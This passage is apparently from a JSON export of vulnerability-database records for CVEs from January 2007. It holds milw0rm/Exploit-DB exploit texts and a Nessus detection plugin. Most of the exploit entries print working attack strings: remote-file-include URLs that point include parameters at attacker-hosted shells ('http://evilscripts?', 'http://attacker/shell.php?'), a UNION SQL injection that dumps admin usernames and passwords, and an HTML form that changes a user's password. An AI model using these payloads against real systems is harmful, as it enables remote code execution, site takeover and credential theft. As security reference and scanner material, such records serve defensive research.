Vulnerability\n# Author : ajann\n# Contact : :(\n# S.Page : http://www.microniko.net/phpmyring/\n# $$ : Free\n\n*******************************************************************************\n[[ERROR]]]\n..\n...\n.....\n<?\ninclude ($fichier.\".php\");\n?>\n..\n...\n.....\n\n[[ERROR]]]\n\n\n[[RFI]]]\n\nhttp://[target]/[path]//lang/leslangues.php?fichier=[SHELL]\n\nExample:\n\n//lang/leslangues.php?fichier=http://[target]/[path]/shell.x\n\n[[/RFI]]\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# ajann,Turkey\n# ...\n\n# Im not Hacker!\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3238/"}, {"lastseen": "2016-01-31T18:02:39", "description": "Cerulean Portal System 0.7b Remote File Include Vulnerability. CVE-2007-0684. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Cerulean Portal System 0.7b Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0684"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3243", "href": "https://www.exploit-db.com/exploits/3243/", "sourceData": "-----------------------------------------------\n\nCerulean Portal System (phpbb_root_path) Remote File Include Exploit\n\n-----------------------------------------------\n\nAuthor: xoron\n\nxoron.biz - xoron.info\n\n-----------------------------------------------\n\nCode: \n\ninclude ($phpbb_root_path . 'portal/config.' . $phpEx);\n\n-----------------------------------------------\n\nPOC:\n\nwww.[target].com/[script_pat]/portal/portal.php?phpbb_root_path=http://evilscripts?\n\n-----------------------------------------------\n\nExploit: Exploit coded by xoron..!\n\nHTML\nwww.xoron.info/bugs/ceruleanportalsystem-html.txt\n\nPERL\nwww.xoron.info/bugs/ceruleanportalsystem-perl.txt\n\n-----------------------------------------------\n\ndownload: http://sourceforge.net/projects/cerulean/\n\n-----------------------------------------------\n\nTesekkurler: pang0, chaos, can bjorn\n\nThanx: str0ke, kacper\n\nxoron gider izi kalir, selametle.\n\nkaybetmenin tiryakisi bir cocuk xoron.\n\nAdimizi altin harflerle yazdik.\n\n-----------------------------------------------\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3243/"}, {"lastseen": "2016-01-31T18:01:44", "description": "Phpbb Tweaked <= 3 (phpbb_root_path) Remote Inclusion Vulnerability. CVE-2007-0680. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Phpbb Tweaked <= 3 phpbb_root_path Remote Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0680"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3235", "href": "https://www.exploit-db.com/exploits/3235/", "sourceData": "-----------------------------------------------\n\nPhpbb Tweaked (phpbb_root_path) Remote File Include Exploit\n\n-----------------------------------------------\n\nAuthor: xoron\n\nxoron.biz - xoron.info\n\n-----------------------------------------------\n\nCode:\ninclude_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );\n\n-----------------------------------------------\n\nPOC:\n\nwww.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?\n\n-----------------------------------------------\n\nExploit:\n\nwww.xoron.info/bugs/phpbbtweaked.txt\n\n-----------------------------------------------\n\ndownload: http://sourceforge.net/projects/phpbbtweaked/\n\n-----------------------------------------------\n\nTesekkurler: pang0, chaos, can bjorn\nThanx: str0ke, kacper\n \n-----------------------------------------------\n\nxoron gider izi kalir, selametle.\n\nkaybetmenin tiryakisi bir cocuk xoron.\n\nAdimizi altin harflerle yazdik.\n\n-----------------------------------------------\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3235/"}, {"lastseen": "2016-01-31T18:01:58", "description": "Cadre PHP Framework Remote File Include Vulnerability. CVE-2007-0677. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Cadre PHP Framework Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0677"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3237", "href": "https://www.exploit-db.com/exploits/3237/", "sourceData": "____________________ ___ ___ ________\n\\_ _____/\\_ ___ \\ / | \\\\_____ \\\n | __)_ / \\ \\// ~ \\/ | \\\n | \\\\ \\___\\ Y / | \\\n/_______ / \\______ /\\___|_ /\\_______ /\n \\/ \\/ \\/ \\/ .OR.ID\nECHO_ADV_63$2007\n\n------------------------------------------------------------------------------------\n[ECHO_ADV_63$2007] Cadre remote file inclusion\n------------------------------------------------------------------------------------\n\nAuthor\t\t: Ahmad Muammar W.K (a.k.a) y3dips\nDate Found\t: January, 31st 2007\nLocation\t: Indonesia, Jakarta\nweb\t\t: http://echo.or.id/adv/adv63-y3dips-2007.txt\nCritical Lvl\t: Critical\n------------------------------------------------------------------------------------\n\n\nAffected software description:\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nApplication : Cadre\nURL : http://www.cronosys.com | http://savannah.gnu.org/projects/cadre/\nDownload-path : http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.tar.gz\n\nDescription : Cadre is a PHP framework for developing large business applications. \n\t\tIt currently supports PostgreSQL as the database back end (although \n\t\tthis is extensible). We (Cronosys, LLC) have invested two and a half \n\t\tyears in this framework and applications based on this framework.\n\n---------------------------------------------------------------------------\n\nVulnerability:\n~~~~~~~~~~\n\n\t---------------class.Quick_Config_Browser.php --------------------\n\t...\n\tinclude_once($GLOBALS[config][framework_path] . \"class.Browser.php\");\n\t...\n\t------------------------------------------------------------------\n\n\n\tAn attacker can exploit this vulnerability with a simple php injection script.\n\nPoc/Exploit:\n~~~~~~~~\n\nhttp://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?\n\n---------------------------------------------------------------------------\nShoutz:\n~~~\n~ my lovely ana\n~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff\n~ str0ke, waraxe, negative\n~ newbie_hacker@yahoogroups.com\n~ #e-c-h-o @irc.dal.net\n\n---------------------------------------------------------------------------\nContact:\n~~~~\n\n y3dips|| echo|staff || y3dips[at]gmail[dot]com\n Homepage: http://y3dips.echo.or.id/\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3237/"}, {"lastseen": "2016-01-31T18:01:30", "description": "Fullaspsite Asp Hosting Sitesi (tr) SQL Injection Vulnerability. CVE-2007-0678. Webapps exploit for asp platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Fullaspsite Asp Hosting Sitesi tr SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0678"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3233", "href": "https://www.exploit-db.com/exploits/3233/", "sourceData": "###############################################################\n#Fullaspsite Asp Hosting (tr) == SQL Injection Vulnerability\n#Author : cl24zy - DrEgHoT - TuF4N\n#Site : www.hacklive.org , www.illegal-attack.org\n#Contact: admin@hacklive.org\n###############################################################\n#Download Link Of Fullaspsite Asp Hosting Sitesi (tr) :\nhttp://www.aspindir.com/Goster/4383\n#Demo : http://aspsiteler.fullaspsite.com/hosting\n\n#Exploit;\n#Admin Nick, Passport;\nhttp://[SITE]/windows.asp?kategori_id=-1%20union+all+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin\n\n\n#Union data Text;\n#Alt Domain : Admin UserName\n#Anl.k Trafik : Admin Password\n\n#Greetz: iLLeGaL-ATTaCK//TiM & HacKLivETeaM\n################################################################\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3233/"}, {"lastseen": "2016-01-31T18:02:12", "description": "Extcalendar <= 2 (profile.php) Remote User Pass Change Exploit. CVE-2007-0681. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Extcalendar <= 2 profile.php Remote User Pass Change Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0681"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3239", "href": "https://www.exploit-db.com/exploits/3239/", "sourceData": "<form name=\"userform\" action=\"http://[target]/register.php\" method=\"post\">\n\t\t<input name=\"step\" type=\"hidden\" value=\"regform\">\n\n\n\t\t<tr>\n\t\t\t<td class='tableh2' colspan='2'>Account Information</td>\n\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Username</td>\n\t\t\t<td class='tableb'>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Password</td>\n\n\t\t\t<td class='tableb'><input type='password' name='password' class='textinput' value=\"\" size='25' maxlength=\"16\">\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Confirm Password</td>\n\t\t\t<td class='tableb'><input type='password' name='password_confirm' class='textinput' value=\"\" size='25' maxlength=\"16\">\n\t\t\t</td>\n\t\t</tr>\n\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>E-mail Address</td>\n\t\t\t<td class='tableb'><input type='text' name='email' class='textinput' value=\"\" size='25'>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class='tableh2' colspan='2'>Other Details</td>\n\t\t</tr>\n\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>First Name</td>\n\t\t\t<td class='tableb'><input type='text' name='firstname' class='textinput' value=\"\" size='25'>\n\t\t\t</td>\n\t\t</tr>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Last Name</td>\n\t\t\t<td class='tableb'><input type='text' name='lastname' class='textinput' value=\"\" size='25'>\n\n\t\t\t</td>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Home page</td>\n\t\t\t<td class='tableb'><input type='text' name='user_website' class='textinput' value=\"\" size='25'>\n\t\t\t</td>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Location</td>\n\t\t\t<td class='tableb'><input type='text' name='user_location' class='textinput' value=\"\" size='25'>\n\n\t\t\t</td>\n\t\t<tr>\n\t\t\t<td class='tableb' width='160'>Occupation</td>\n\t\t\t<td class='tableb'><input type='text' name='user_occupation' class='textinput' value=\"\" size='25'>\n\t\t\t</td>\n\t\t</tr>\n\n\t\t<tr>\n\n\t\t\t<td class='tablec' colspan='2' align='center' valign='middle' height='40'>\n\t\t\t\t<input name='submit' type='submit' value=\" Submit my registration \" class='button'>\n\t\t\t</td>\n\t\t</tr>\n<!-- END submit_row -->\n\t</form>\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3239/"}, {"lastseen": "2016-01-31T18:02:32", "description": "Omegaboard <= 1.0beta4 (functions.php) Remote File Include Vuln. CVE-2007-0683. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Omegaboard <= 1.0beta4 functions.php Remote File Include Vuln", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0683"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3242", "href": "https://www.exploit-db.com/exploits/3242/", "sourceData": "-----------------------------------------------\n\nOmegaboard v1.0b4 (phpbb_root_path) Remote File Include Exploit\n\n-----------------------------------------------\n\nAuthor: xoron\n\nxoron.biz - xoron.info\n\n-----------------------------------------------\n\nCode: \n\ninclude_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );\n\n-----------------------------------------------\n\nPOC:\n\nwww.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?\n\n-----------------------------------------------\n\nExploit: Exploit coded by xoron..!\n\nHTML\nwww.xoron.info/bugs/omegaboard-html.txt\n\nPERL\nwww.xoron.info/bugs/omegaboard-perl.txt\n\n-----------------------------------------------\n\ndownload: http://sourceforge.net/project/showfiles.php?group_id=120703\n\n-----------------------------------------------\n\nTesekkurler: pang0, chaos, can bjorn\n\nThanx: str0ke, kacper\n\nxoron gider izi kalir, selametle.\n\nkaybetmenin tiryakisi bir cocuk xoron.\n\nAdimizi altin harflerle yazdik.\n\n-----------------------------------------------\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3242/"}, {"lastseen": "2016-01-31T18:01:51", "description": "Hailboards 1.2.0 (phpbb_root_path) Remote File Include Vulnerability. CVE-2007-0662. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "Hailboards 1.2.0 phpbb_root_path Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0662"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:3236", "href": "https://www.exploit-db.com/exploits/3236/", "sourceData": "-----------------------------------------------\n\nHailboards v1.2.0 (phpbb_root_path) Remote File Include Exploit\n\n-----------------------------------------------\n\nAuthor: xoron\n\nxoron.biz - xoron.info\n\n-----------------------------------------------\n\nCode:\n\ninclude($phpbb_root_path . 'includes/bbcode.'.$phpEx);\n\n-----------------------------------------------\n\nPOC:\n\nwww.[target].com/[script_pat]/includes/usercp_viewprofile.php?phpbb_root_path=http://evilscripts?\n\n-----------------------------------------------\n\nExploit:\n\nwww.xoron.info/bugs/hailboards.txt\n\n-----------------------------------------------\n\ndownload: http://hailboards.org/\n\n-----------------------------------------------\n\nTesekkurler: pang0, chaos, can bjorn\n\nThanx: str0ke, kacper\n\nxoron gider izi kalir, selametle.\n\nkaybetmenin tiryakisi bir cocuk xoron.\n\nAdimizi altin harflerle yazdik.\n\n-----------------------------------------------\n\n# milw0rm.com [2007-01-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3236/"}, {"lastseen": "2016-02-03T10:34:56", "description": "OpenEMR 2.8.2 Import_XML.PHP Remote File Include Vulnerability. CVE-2007-0649. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "OpenEMR 2.8.2 Import_XML.PHP Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0649"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:29556", "href": "https://www.exploit-db.com/exploits/29556/", "sourceData": "source: http://www.securityfocus.com/bid/22346/info\r\n\r\nOpenEMR is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.\r\n\r\nExploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n\r\nThis issue affects version 2.8.2; other versions may also be vulnerable. \r\n\r\nhttp://www.example.com/openemr-2.8.2/custom/import_xml.php?srcdir=evilcode ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:HIGH/Au:MULTIPLE_INSTANCES/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29556/"}, {"lastseen": "2016-02-03T10:35:04", "description": "OpenEMR 2.8.2 Login_Frame.PHP Cross-Site Scripting Vulnerability. CVE-2007-0649. Webapps exploit for php platform", "published": "2007-01-31T00:00:00", "type": "exploitdb", "title": "OpenEMR 2.8.2 Login_Frame.PHP Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0649"], "modified": "2007-01-31T00:00:00", "id": "EDB-ID:29557", "href": "https://www.exploit-db.com/exploits/29557/", "sourceData": "source: http://www.securityfocus.com/bid/22348/info\r\n\r\nOpenEMR is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.\r\n\r\nThis issue affects version 2.8.2; other versions may also be vulnerable. \r\n\r\nhttp://www.example.com/openemr/interface/login/login_frame.php?rootdir=[XSS] ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:HIGH/Au:MULTIPLE_INSTANCES/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29557/"}], "nessus": [{"lastseen": "2021-01-20T10:04:25", "description": "The remote host is running Exo PHPDesk, a helpdesk application written\nin PHP. \n\nThe version of Exo PHPDesk on the remote host fails to properly\nsanitize input to the 'id' parameter of the 'faq.php' script before\nusing it in database queries. Provided PHP's 'magic_quotes_gpc'\nsetting is disabled, an unauthenticated, remote attacker can leverage\nthis issue to launch SQL injection attacks against the affected\napplication, leading to discovery of sensitive information, attacks\nagainst the underlying database, and the like.", "edition": 24, "published": "2007-02-01T00:00:00", "title": "ExoPHPDesk faq.php id Parameter SQL Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0676"], "modified": "2007-02-01T00:00:00", "cpe": [], "id": "EXOPHPDESK_ID_SQL_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/24267", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24267);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2007-0676\");\n script_bugtraq_id(22338);\n script_xref(name:\"EDB-ID\", value:\"3234\");\n\n script_name(english:\"ExoPHPDesk faq.php id Parameter SQL Injection\");\n script_summary(english:\"Tries to generate a SQL error with Exo PHPDesk\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to SQL\ninjection attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Exo PHPDesk, a helpdesk application written\nin PHP. \n\nThe version of Exo PHPDesk on the remote host fails to properly\nsanitize input to the 'id' parameter of the 'faq.php' script before\nusing it in database queries. Provided PHP's 'magic_quotes_gpc'\nsetting is disabled, an unauthenticated, remote attacker can leverage\nthis issue to launch SQL injection attacks against the affected\napplication, leading to discovery of sensitive information, attacks\nagainst the underlying database, and the like.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80, embedded: 0);\nif (!can_host_php(port:port)) exit(0);\n\n# Loop through various directories.\nif (thorough_tests) dirs = list_uniq(make_list(\"/exophpdesk\", \"/exodesk\", \"/helpdesk\", \"/support\", cgi_dirs()));\nelse dirs = make_list(cgi_dirs());\n\nforeach dir (dirs)\n{\n # Try to exploit the flaw.\n magic = rand();\n exploit = string(\"-1' UNION SELECT 0,\", magic, \",0,0,0,0,0--\");\n\n r = http_send_recv3(method:\"GET\",\n item:string(\n dir, \"/faq.php?\",\n \"action=&\",\n \"type=view&\",\n \"s=&\",\n \"id=\", urlencode(str:exploit)\n ), port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # it looks like LifeType and...\n \">Powered by ExoPHPDesk\" >< res &&\n # it uses our magic for the FAQ title.\n string(\">F.A.Q. Title: \", magic, \"</\") >< res\n )\n {\n security_warning(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
